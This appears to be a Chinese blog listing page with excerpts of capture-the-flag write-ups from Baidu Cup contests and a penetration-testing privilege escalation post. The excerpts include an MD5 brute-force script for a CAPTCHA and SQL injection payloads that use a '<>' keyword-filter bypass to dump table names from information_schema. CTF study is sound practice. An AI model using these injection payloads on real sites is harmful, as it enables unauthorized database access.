百度杯十月场1

GetFlag1、 首先是要登陆,但是登陆要验证码,算法已经给出了,写个脚本 1234567import md5for x in range(1,10000000): y = str(x) z = md5.new(y).hexdigest() #print z if z[0:6] == 'XXXXXX': print x     继续阅读
Geroge Lee's avatar
Geroge Lee 10月 20, 2016

我很简单,不要欺负我

一次虚拟渗透提权1、查看环境 2、御剑扫目录     继续阅读
Geroge Lee's avatar
Geroge Lee 10月 16, 2016

百度杯九月场3

一、1231、 先看源码,提示有user.php,并且告诉你密码的排序方式     继续阅读
Geroge Lee's avatar
Geroge Lee 10月 16, 2016

百度杯九月场2

一、sql123456php?id=1 un<>ion se<>lest 1,2,3回显 flag{在数据库中}2 第二个字段是可以显示的 123456http://57013df126fb4ca4b3280f842df66e1df71ea932206644c2.game.ichunqiu.com/index.php?id=1 un<>ion s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()回显 flag{在数据库中} info     继续阅读
Geroge Lee's avatar
Geroge Lee 10月 09, 2016